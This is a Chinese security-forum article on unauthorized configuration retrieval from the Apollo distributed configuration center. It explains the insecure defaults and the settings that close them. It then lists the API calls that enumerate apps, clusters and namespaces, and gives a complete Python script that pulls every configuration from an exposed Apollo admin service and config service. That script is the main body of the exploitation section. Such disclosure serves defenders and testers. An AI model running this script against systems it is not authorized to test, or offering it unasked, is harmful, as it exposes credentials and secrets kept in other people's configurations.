奇安信攻防社区-Apollo 配置中心未授权获取配置漏洞利用

Apollo 配置中心未授权获取配置漏洞利用

Apollo（阿波罗）是携程框架部门研发的分布式配置中心，能够集中化管理应用不同环境、不同集群的配置，配置修改后能够实时推送到应用端，并且具备规范的权限、流程治理等特性，适用于微服务配置管理场景。

Apollo 配置中心未授权获取配置漏洞利用
----------------------

### 0x00：背景

> Apollo（阿波罗）是携程框架部门研发的分布式配置中心，能够集中化管理应用不同环境、不同集群的配置，配置修改后能够实时推送到应用端，并且具备规范的权限、流程治理等特性，适用于微服务配置管理场景。

- 项目地址: <https://github.com/ctripcorp/apollo>

### 0x01：默认不安全

从 [issues-2099](https://github.com/ctripcorp/apollo/issues/2099) 可以看出，根本不需要通过要鉴权的 apollo-dashboard ，只要通过伪造成客户端，即可未授权获取相应的配置信息。

Apollo 官方的解决方案是：

1.6.0 版本开始增加访问密钥机制，只有经过身份验证的客户端才能访问敏感配置。如果应用开启了访问密钥，客户端需要配置密钥，否则无法获取配置。[但是默认不会开启此项功能](https://github.com/ctripcorp/apollo/pull/2828)。

1.7.1 版本开始可以为 apollo-adminservice 开启访问控制，从而只有合法的 apollo-portal 才能访问对应接口，以增强安全性。类似于增加配置：

```php
admin-service.access.control.enabled = true
admin-service.access.tokens=098f6bcd4621d373xade4e832627b4f6
```

有意思的是，默认 `admin-service.access.control.enabled` 值为 `false`，[也就是默认不会开启此项功能](https://github.com/ctripcorp/apollo/pull/3233)。

### 0x02：环境搭建

使用 <https://github.com/nobodyiam/apollo-build-scripts> 快速搭建好 demo。

- 默认开放的端口情况：

| 端口号 | 服务类型 |
|---|---|
| 8070 | apollo-dashboard |
| 8080 | apollo-configservice |
| 8090 | apollo-adminservice |

- 网站首页

apollo-dashboard

![img](https://shs3.b.qianxin.com/butian_public/ff3523a3709ed11b79c89b285687b0709.jpg)

apollo-configservice

![img](https://shs3.b.qianxin.com/butian_public/f18fc7af237566df829b7add33909e605.jpg)

apollo-adminservice

![img](https://shs3.b.qianxin.com/butian_public/feaf5e744f854ab97dbf25af5208106cd.jpg)

### 0x03：漏洞利用

由于网上没有漏洞细节，所以我下载了 Apollo 源码，分析了下几个服务的相关代码，下面给出一种利用方法。

大致流程就是利用默认可未授权访问的 `apollo-configservice` 和 `apollo-adminservice` 服务，通过调用相关接口获取所有能够获取到的配置信息。

```php
# 1. 获取所有的应用基本信息(包含 appId)
http://test.landgrey.me:8090/apps

# 2. 获取相关 appId 的所有 cluster
http://test.landgrey.me:8090/apps/<appId>/clusters

# 3. 获取相关 appId 的 namespaces
http://test.landgrey.me:8090/apps/<appId>/appnamespaces

# 4. 组合 appId cluster namespaceName 获取配置 configurations
http://test.landgrey.me:8080/configs/<appId>/<cluster>/<namespaceName>
```

python3 利用脚本：

```php
#!/usr/bin/env python3
# coding: utf-8
# Build By LandGrey

import json
import time
import requests
from urllib.parse import urlparse

def get_response(uri):
    headers = {
        "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:60.0) Gecko/20200101 Firefox/60.0",
        "Accept-Encoding": "gzip, deflate",
        "Accept-Language": "zh-CN,zh;q=0.9",
        "Connection": "close"
    }
    return requests.get(uri, headers=headers, timeout=20, allow_redirects=False)

def get_app_ids(uri):
    app_ids = []
    response = get_response("{}/apps".format(uri))
    html = response.text
    if response.status_code == 200:
        for app in json.loads(html):
            app_ids.append(app.get("appId"))
    return app_ids

def get_clusters(uri, app_ids):
    clusters = {}
    for app_id in app_ids:
        clusters[app_id] = []
        response = get_response("{}/apps/{}/clusters".format(uri, app_id))
        html = response.text
        if response.status_code == 200:
            for app in json.loads(html):
                clusters[app_id].append(app.get("name"))
    return clusters

def get_namespaces(uri, app_ids, clusters):
    namespaces = {}
    for app_id in app_ids:
        namespaces[app_id] = []
        for cluster in clusters[app_id]:
            url = "{}/apps/{}/clusters/{}/namespaces".format(uri, app_id, cluster)
            response = get_response(url)
            html = response.text
            if response.status_code == 200:
                for app in json.loads(html):
                    namespaces[app_id].append(app.get("namespaceName"))
    return namespaces

def get_configurations(uri, app_ids, clusters, namespaces):
    configurations = []
    for app_id in app_ids:
        for cluster in clusters[app_id]:
            for namespace in namespaces[app_id]:
                key_name = "{}-{}-{}".format(app_id, cluster, namespace)
                url = "{}/configs/{}/{}/{}".format(uri, app_id, cluster, namespace)
                response = get_response(url)
                code = response.status_code
                html = response.text
                print("[+] get {} configs, status: {}".format(url, code))
                time.sleep(1)
                if code == 200:
                    configurations.append({key_name: json.loads(html)})
    return configurations

if __name__ == "__main__":
    apollo_adminservice = "http://test.landgrey.me:8090"
    apollo_configservice = "http://test.landgrey.me:8080"

scheme0, netloc0, path0, params0, query0, fragment0 = urlparse(apollo_adminservice)
    host0 = "{}://{}".format(scheme0, netloc0)

_ids = get_app_ids(host0)
    print("All appIds:")
    print(_ids)

_clusters = get_clusters(host0, _ids)
    print("\nAll Clusters:")
    print(_clusters)

_namespaces = get_namespaces(host0, _ids, _clusters)
    print("\nAll Namespaces:")
    print(_namespaces)
    print()

scheme1, netloc1, path1, params1, query1, fragment1 = urlparse(apollo_configservice)
    host1 = "{}://{}".format(scheme1, netloc1)
    _configurations = get_configurations(host1, _ids, _clusters, _namespaces)
    print("\nresults:\n")
    print(_configurations)
```

![img](https://shs3.b.qianxin.com/butian_public/fa0b9dbd2fc72c1452c499785f3d5d5ab.jpg)

### 参考文章

<https://github.com/ctripcorp/apollo/wiki>

文章首发在自己博客，原文地址为：<https://landgrey.me/blog/20/>

发表于 2021-04-16 15:38:46
阅读 ( 9189 )
分类：漏洞分析

Apollo 配置中心未授权获取配置漏洞利用

0 条评论